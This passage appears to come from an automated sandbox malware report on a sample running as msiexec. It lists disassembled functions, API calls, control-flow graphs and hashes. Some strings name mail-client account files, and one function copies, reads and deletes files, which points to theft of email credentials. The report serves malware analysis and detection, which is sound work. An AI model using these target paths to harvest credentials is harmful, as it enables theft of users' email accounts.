                                                                                        control_flow_graph 287 2232aa53-2232aa6e 288 2232aa80 287->288 289 2232aa70-2232aa7e RtlDecodePointer 287->289 290 2232aa85-2232aa8b 288->290 289->290 291 2232abb2-2232abb5 290->291 292 2232aa91 290->292 295 2232ac12 291->295 296 2232abb7-2232abba 291->296 293 2232aba6 292->293 294 2232aa97-2232aa9a 292->294 297 2232aba8-2232abad 293->297 298 2232aaa0 294->298 299 2232ab47-2232ab4a 294->299 300 2232ac19 295->300 301 2232ac06 296->301 302 2232abbc-2232abbf 296->302 303 2232ac5b-2232ac6a call 22322ada 297->303 304 2232aaa6-2232aaab 298->304 305 2232ab34-2232ab42 298->305 309 2232ab4c-2232ab4f 299->309 310 2232ab9d-2232aba4 299->310 306 2232ac20-2232ac49 300->306 301->295 307 2232abc1-2232abc4 302->307 308 2232abfa 302->308 313 2232ab25-2232ab2f 304->313 314 2232aaad-2232aab0 304->314 305->306 334 2232ac56-2232ac59 306->334 335 2232ac4b-2232ac50 call 22326368 306->335 315 2232abc6-2232abc9 307->315 316 2232abee 307->316 308->301 317 2232ab51-2232ab54 309->317 318 2232ab94-2232ab9b 309->318 312 2232ab61-2232ab8f 310->312 312->334 313->306 320 2232aab2-2232aab5 314->320 321 2232ab1c-2232ab23 314->321 323 2232abe2 315->323 324 2232abcb-2232abd0 315->324 316->308 317->303 325 2232ab5a 317->325 318->300 327 2232aab7-2232aaba 320->327 328 2232ab0d-2232ab17 320->328 326 2232aac7-2232aaf7 321->326 323->316 329 2232abd2-2232abd5 324->329 330 2232abdb-2232abe0 324->330 325->312 326->334 341 2232aafd-2232ab08 call 22326368 326->341 327->303 332 2232aac0 327->332 328->306 329->303 329->330 330->297 332->326 334->303 335->334 341->334
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: DecodePointer
                                                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                        • API String ID: 3527080286-3064271455
                                                                                        • Opcode ID: 74ebdd032dc9728860a7592a9c332738d32e9fbc46962dfc5cdfc3dedbf4fd21
                                                                                        • Instruction ID: cccbfd9f2a828fd2703de262f96282ce31fa8f6d1aa8ac81c1f8a7ce2b26fb21
                                                                                        • Opcode Fuzzy Hash: 74ebdd032dc9728860a7592a9c332738d32e9fbc46962dfc5cdfc3dedbf4fd21
                                                                                        • Instruction Fuzzy Hash: 42516DB4900B19CBEB01DFA4DA886DCBBB9FF09314F104785E581A6669CB398E25CB54
                                                                                        Function 22321CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22321D1B
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22321D37
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22321D4B
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22321D58
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22321D72
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22321D7D
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22321D8A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                        • String ID:
                                                                                        • API String ID: 1454806937-0
                                                                                        • Opcode ID: 0f8a57d9f9150b78592934807e08ae9f675beb1acd85bcc7af8f754b90be4de1
                                                                                        • Instruction ID: 32d311a81ab21085f9eb294ac2f9841792dccd8aa3f341be6c80fe45062785e2
                                                                                        • Opcode Fuzzy Hash: 0f8a57d9f9150b78592934807e08ae9f675beb1acd85bcc7af8f754b90be4de1
                                                                                        • Instruction Fuzzy Hash: 712160B194131CBFDB119BA08D8CFEB77ACFB18354F014AAAFA01D2155D6749E458B70
                                                                                        Function 22329492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 361 22329492-223294ef GetConsoleCP 362 22329632-22329644 call 22322ada 361->362 363 223294f5-22329511 361->363 364 22329513-2232952a 363->364 365 2232952c-2232953d call 22327c19 363->365 367 22329566-22329575 call 223279e6 364->367 372 22329563-22329565 365->372 373 2232953f-22329542 365->373 367->362 377 2232957b-2232959b WideCharToMultiByte 367->377 372->367 375 22329548-2232955a call 223279e6 373->375 376 22329609-22329628 373->376 375->362 384 22329560-22329561 375->384 376->362 377->362 379 223295a1-223295b7 WriteFile 377->379 380 2232962a-22329630 GetLastError 379->380 381 223295b9-223295ca 379->381 380->362 381->362 383 223295cc-223295d0 381->383 385 223295d2-223295f0 WriteFile 383->385 386 223295fe-22329601 383->386 384->377 385->380 387 223295f2-223295f6 385->387 386->363 388 22329607 386->388 387->362 389 223295f8-223295fb 387->389 388->362 389->386
                                                                                        APIs
                                                                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,22329C07,?,00000000,?,00000000,00000000), ref: 223294D4
                                                                                        • __fassign.LIBCMT ref: 2232954F
                                                                                        • __fassign.LIBCMT ref: 2232956A
                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 22329590
                                                                                        • WriteFile.KERNEL32(?,?,00000000,22329C07,00000000,?,?,?,?,?,?,?,?,?,22329C07,?), ref: 223295AF
                                                                                        • WriteFile.KERNEL32(?,?,?,22329C07,00000000,?,?,?,?,?,?,?,?,?,22329C07,?), ref: 223295E8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 1324828854-0
                                                                                        • Opcode ID: 4c9728468b40d65cc7d985a67c9c77a8ce1cf7db84a21b43daa53d84b6457611
                                                                                        • Instruction ID: e0de58eb57213eef791e79408e0ed8bf0ec2b4164594e9544cf95c964ec86d9b
                                                                                        • Opcode Fuzzy Hash: 4c9728468b40d65cc7d985a67c9c77a8ce1cf7db84a21b43daa53d84b6457611
                                                                                        • Instruction Fuzzy Hash: 4651A3B1E007499FDB10CFA4C895AEEBBF8FF09710F24461AE955E7281D6309E41CBA0
                                                                                        Function 22323370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 390 22323370-223233b5 call 22323330 call 223237a7 395 22323416-22323419 390->395 396 223233b7-223233c9 390->396 397 2232341b-22323428 call 22323790 395->397 398 22323439-22323442 395->398 396->398 399 223233cb 396->399 402 2232342d-22323436 call 22323330 397->402 401 223233d0-223233e7 399->401 403 223233e9-223233f7 call 22323740 401->403 404 223233fd 401->404 402->398 411 223233f9 403->411 412 2232340d-22323414 403->412 407 22323400-22323405 404->407 407->401 410 22323407-22323409 407->410 410->398 413 2232340b 410->413 414 22323443-2232344c 411->414 415 223233fb 411->415 412->402 413->402 416 22323486-22323496 call 22323774 414->416 417 2232344e-22323455 414->417 415->407 422 223234aa-223234c6 call 22323330 call 22323758 416->422 423 22323498-223234a7 call 22323790 416->423 417->416 419 22323457-22323466 call 2232bbe0 417->419 427 22323483 419->427 428 22323468-22323480 419->428 423->422 427->416 428->427
                                                                                        APIs
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 2232339B
                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 223233A3
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 22323431
                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 2232345C
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 223234B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                        • String ID: csm
                                                                                        • API String ID: 1170836740-1018135373
                                                                                        • Opcode ID: 06c95c8b8d8e161082077e2ff2bb904877a43de474955e3685dd6097ac8abd6c
                                                                                        • Instruction ID: 2312b11955d36a5543edae5e3fe510d363f190ceedaabfa921cf6e1ec49ec54b
                                                                                        • Opcode Fuzzy Hash: 06c95c8b8d8e161082077e2ff2bb904877a43de474955e3685dd6097ac8abd6c
                                                                                        • Instruction Fuzzy Hash: 6C419174F007089BCF11CF68C984A9EBBB5AF45328F148396EA159F251D735DE05CB91
                                                                                        Function 2232925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 22329221: _free.LIBCMT ref: 2232924A
                                                                                        • _free.LIBCMT ref: 223292AB
                                                                                          • Part of subcall function 2232571E: HeapFree.KERNEL32(00000000,00000000,?,2232924F,?,00000000,?,00000000,?,22329276,?,00000007,?,?,22327E5A,?), ref: 22325734
                                                                                          • Part of subcall function 2232571E: GetLastError.KERNEL32(?,?,2232924F,?,00000000,?,00000000,?,22329276,?,00000007,?,?,22327E5A,?,?), ref: 22325746
                                                                                        • _free.LIBCMT ref: 223292B6
                                                                                        • _free.LIBCMT ref: 223292C1
                                                                                        • _free.LIBCMT ref: 22329315
                                                                                        • _free.LIBCMT ref: 22329320
                                                                                        • _free.LIBCMT ref: 2232932B
                                                                                        • _free.LIBCMT ref: 22329336
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                        • Instruction ID: fab858b2dd7c2b65753ba1e3895530d00041578e92412961008e6b97b8c2bb09
                                                                                        • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                        • Instruction Fuzzy Hash: 0F119332990F1CFAD730ABF0DC55FCB7B9D9F14700F404A24A6997A052DA74BD044751
                                                                                        Function 22328821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 472 22328821-2232883a 473 22328850-22328855 472->473 474 2232883c-2232884c call 22329341 472->474 476 22328862-22328886 MultiByteToWideChar 473->476 477 22328857-2232885f 473->477 474->473 481 2232884e 474->481 479 22328a19-22328a2c call 22322ada 476->479 480 2232888c-22328898 476->480 477->476 482 2232889a-223288ab 480->482 483 223288ec 480->483 481->473 486 223288ca-223288db call 223256d0 482->486 487 223288ad-223288bc call 2232bf20 482->487 485 223288ee-223288f0 483->485 490 223288f6-22328909 MultiByteToWideChar 485->490 491 22328a0e 485->491 486->491 497 223288e1 486->497 487->491 500 223288c2-223288c8 487->500 490->491 494 2232890f-2232892a call 22325f19 490->494 495 22328a10-22328a17 call 22328801 491->495 494->491 504 22328930-22328937 494->504 495->479 501 223288e7-223288ea 497->501 500->501 501->485 505 22328971-2232897d 504->505 506 22328939-2232893e 504->506 507 223289c9 505->507 508 2232897f-22328990 505->508 506->495 509 22328944-22328946 506->509 512 223289cb-223289cd 507->512 510 22328992-223289a1 call 2232bf20 508->510 511 223289ab-223289bc call 223256d0 508->511 509->491 513 2232894c-22328966 call 22325f19 509->513 516 22328a07-22328a0d call 22328801 510->516 526 223289a3-223289a9 510->526 511->516 528 223289be 511->528 512->516 517 223289cf-223289e8 call 22325f19 512->517 513->495 525 2232896c 513->525 516->491 517->516 529 223289ea-223289f1 517->529 525->491 530 223289c4-223289c7 526->530 528->530 531 223289f3-223289f4 529->531 532 22328a2d-22328a33 529->532 530->512 533 223289f5-22328a05 WideCharToMultiByte 531->533 532->533 533->516 534 22328a35-22328a3c call 22328801 533->534 534->495
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,22326FFD,00000000,?,?,?,22328A72,?,?,00000100), ref: 2232887B
                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,22328A72,?,?,00000100,5EFC4D8B,?,?), ref: 22328901
                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 223289FB
                                                                                        • __freea.LIBCMT ref: 22328A08
                                                                                          • Part of subcall function 223256D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22325702
                                                                                        • __freea.LIBCMT ref: 22328A11
                                                                                        • __freea.LIBCMT ref: 22328A36
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1414292761-0
                                                                                        • Opcode ID: 4ecac9acea84ca227a66c2abb1d7c487099388df528001cfe877c63c7cea9c7c
                                                                                        • Instruction ID: 73bf9c0105dc5caa78094236388899f0b0d0bd43541627121335359ae671022c
                                                                                        • Opcode Fuzzy Hash: 4ecac9acea84ca227a66c2abb1d7c487099388df528001cfe877c63c7cea9c7c
                                                                                        • Instruction Fuzzy Hash: E851F072610B16AFEB258E60CD80FAB37AAEF54758F514729FD04E6180EB34EC50C6B0
                                                                                        Function 223215DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • _strlen.LIBCMT ref: 22321607
                                                                                        • _strcat.LIBCMT ref: 2232161D
                                                                                        • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,2232190E,?,?,00000000,?,00000000), ref: 22321643
                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,2232190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 2232165A
                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,2232190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 22321661
                                                                                        • lstrcatW.KERNEL32(00001008,?,?,?,?,?,2232190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 22321686
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                        • String ID:
                                                                                        • API String ID: 1922816806-0
                                                                                        • Opcode ID: 6e75b22d0fa7f4ca44186eafcfe0562711853d084a6018ba471a506f0b883ca2
                                                                                        • Instruction ID: 3d27b8fd924ec0355fb2b111a60339916d60367fdc7f22d524ee27977392ab00
                                                                                        • Opcode Fuzzy Hash: 6e75b22d0fa7f4ca44186eafcfe0562711853d084a6018ba471a506f0b883ca2
                                                                                        • Instruction Fuzzy Hash: B021DD36A00704ABD715DF54EC80EFE77BCEF48720F24851BEA04AB151DB34AD4187A5
                                                                                        Function 22321000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 22321038
                                                                                        • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 2232104B
                                                                                        • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 22321061
                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 22321075
                                                                                        • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 22321090
                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 223210B8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$AttributesFilelstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 3594823470-0
                                                                                        • Opcode ID: 1dcc397b4b8bcf24c3ef65b5a35b18e52c528e928850f285b046b7de5dc13c7b
                                                                                        • Instruction ID: 04b15f21538cc648f21a2b97c128ec3c2113bee064befcaa74165ddf0f9498a2
                                                                                        • Opcode Fuzzy Hash: 1dcc397b4b8bcf24c3ef65b5a35b18e52c528e928850f285b046b7de5dc13c7b
                                                                                        • Instruction Fuzzy Hash: B321917590071C9BCF209AA0DE48EDB376CEF44314F108756E995A31B2DA719E85CB80
                                                                                        Function 22323856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,22323518,223223F1,22321F17), ref: 22323864
                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 22323872
                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2232388B
                                                                                        • SetLastError.KERNEL32(00000000,?,22323518,223223F1,22321F17), ref: 223238DD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                        • String ID:
                                                                                        • API String ID: 3852720340-0
                                                                                        • Opcode ID: 2a1c7bd7c87fcdd4ba1f7da40472ff07554d4349e9fc0371f0856c327ce5366f
                                                                                        • Instruction ID: 0a6c4609cdd5d848e62cbe3eaae5fe7627bd9675ca7c1620269d06ec191e5202
                                                                                        • Opcode Fuzzy Hash: 2a1c7bd7c87fcdd4ba1f7da40472ff07554d4349e9fc0371f0856c327ce5366f
                                                                                        • Instruction Fuzzy Hash: 47014773A4CF155EF3152AB96D84A162B9CDB55774B20433AF920DC0E1EF394C0883C4
                                                                                        Function 22325AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,22326C6C), ref: 22325AFA
                                                                                        • _free.LIBCMT ref: 22325B2D
                                                                                        • _free.LIBCMT ref: 22325B55
                                                                                        • SetLastError.KERNEL32(00000000,?,?,22326C6C), ref: 22325B62
                                                                                        • SetLastError.KERNEL32(00000000,?,?,22326C6C), ref: 22325B6E
                                                                                        • _abort.LIBCMT ref: 22325B74
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                        • String ID:
                                                                                        • API String ID: 3160817290-0
                                                                                        • Opcode ID: 1032c9a0802a7fb657ff06ce89d26e81e4b51eac3e04f4761cf441caa64aeb28
                                                                                        • Instruction ID: cb03b066048723218b627fe4da7f4d8804a0f476d7ff1f065280734fd5460ac0
                                                                                        • Opcode Fuzzy Hash: 1032c9a0802a7fb657ff06ce89d26e81e4b51eac3e04f4761cf441caa64aeb28
                                                                                        • Instruction Fuzzy Hash: 34F028F3584F00AAD72F22346D64F4E262D8FE1B71F214325FD15A6191FE388F4241A4
                                                                                        Function 223211EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 22321E89: lstrlenW.KERNEL32(?,?,?,?,?,223210DF,?,?,?,00000000), ref: 22321E9A
                                                                                          • Part of subcall function 22321E89: lstrcatW.KERNEL32(?,?,?,223210DF,?,?,?,00000000), ref: 22321EAC
                                                                                          • Part of subcall function 22321E89: lstrlenW.KERNEL32(?,?,223210DF,?,?,?,00000000), ref: 22321EB3
                                                                                          • Part of subcall function 22321E89: lstrlenW.KERNEL32(?,?,223210DF,?,?,?,00000000), ref: 22321EC8
                                                                                          • Part of subcall function 22321E89: lstrcatW.KERNEL32(?,223210DF,?,223210DF,?,?,?,00000000), ref: 22321ED3
                                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 2232122A
                                                                                          • Part of subcall function 2232173A: _strlen.LIBCMT ref: 22321855
                                                                                          • Part of subcall function 2232173A: _strlen.LIBCMT ref: 22321869
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                        • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                        • API String ID: 4036392271-1520055953
                                                                                        • Opcode ID: 0a0412a1d72b02474bb3fce2dcee230b4d56fd5cbcbfe962d5d882cca5717a53
                                                                                        • Instruction ID: 72348ae6a89c4b9905e794189394bf41569644cf9cece8b67e3609e86f31750e
                                                                                        • Opcode Fuzzy Hash: 0a0412a1d72b02474bb3fce2dcee230b4d56fd5cbcbfe962d5d882cca5717a53
                                                                                        • Instruction Fuzzy Hash: E321E979E107086AEB2097D4EC81FED7339EF90714F004646F604EB1E1E7B11E808798
                                                                                        Function 22324B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,22324AEA,?,?,22324A8A,?,22332238,0000000C,22324BBD,00000000,00000000), ref: 22324B59
                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 22324B6C
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,22324AEA,?,?,22324A8A,?,22332238,0000000C,22324BBD,00000000,00000000,?,22322082), ref: 22324B8F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                        • API String ID: 4061214504-1276376045
                                                                                        • Opcode ID: afbb94257cbafc4f03b7418a49dfe20151575adbca9ca6253da1a481a4ed058b
                                                                                        • Instruction ID: 07796c002ee4274fae393a989f7707d56b9ea7f6b2afbf7cb7bb29da77077084
                                                                                        • Opcode Fuzzy Hash: afbb94257cbafc4f03b7418a49dfe20151575adbca9ca6253da1a481a4ed058b
                                                                                        • Instruction Fuzzy Hash: 55F0AF75A4061CBBDB129FA0CC08F9DBFB9EF08365F018269FE05A6154DB349E41CA90
                                                                                        Function 22327153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 2232715C
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2232717F
                                                                                          • Part of subcall function 223256D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22325702
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 223271A5
                                                                                        • _free.LIBCMT ref: 223271B8
                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 223271C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 336800556-0
                                                                                        • Opcode ID: fdd687d30d61c2fa4a1b3937d2e0dd91916e3d88c73fb5c38d264f3173615259
                                                                                        • Instruction ID: 0e7835e02aceb67ac21515a5e9ee0b7d907cc02ecb99ea0334c6791e591f0aa8
                                                                                        • Opcode Fuzzy Hash: fdd687d30d61c2fa4a1b3937d2e0dd91916e3d88c73fb5c38d264f3173615259
